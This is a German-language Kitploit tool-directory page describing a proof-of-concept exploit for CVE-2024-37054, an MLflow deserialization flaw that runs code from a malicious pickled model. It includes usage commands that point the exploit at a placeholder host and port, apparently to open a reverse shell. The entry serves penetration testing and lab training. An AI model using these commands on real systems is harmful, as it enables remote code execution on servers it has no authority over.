Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-37054-PoC — Proof-of-Concept-Exploit für CVE-2024-37054, eine kritische Deserialisierungsschwachstelle in MLflow. Enthält ein vollständiges Exploit-Skript und einen Builder für bösartige Modelle für autorisierte Penetrationstests. | Kitploit
Tools/GitHubGitHub/jimmexploit/cve-2024-37054-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubjimmexploit/cve-2024-37054-poc

CVE-2024-37054-PoC

Proof-of-Concept-Exploit für CVE-2024-37054, eine kritische Deserialisierungsschwachstelle in MLflow. Enthält ein vollständiges Exploit-Skript und einen Builder für bösartige Modelle für autorisierte Penetrationstests.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
64vor 4 MonatenNoch nicht geprüft
Teilen

Beschreibung

Proof of Concept für CVE-2024-37054, eine kritische Deserialisierungsschwachstelle in MLflow-Versionen 0.9.0 bis 2.14.1. Wenn ein bösartiges pyfunc-Modell über mlflow.pyfunc.load_model() geladen wird, führt das gepicklete Payload beliebigen Code aus.

Dateien

  • exploit.py — vollständiger Exploit: registrieren, trainieren, hochladen, auslösen (für HTB SmartHire Machine)
  • build_model.py — böswilliges Modell lokal erstellen (nur Erstellung)

Verwendung

Modell lokal erstellen

python3 build_model.py --lhost YOUR_IP --lport 4444

Vollständigen Exploit ausführen

# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz

# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."

Haftungsausschluss

Nur für Bildungszwecke und autorisierte Penetrationstests.

Tool herunterladen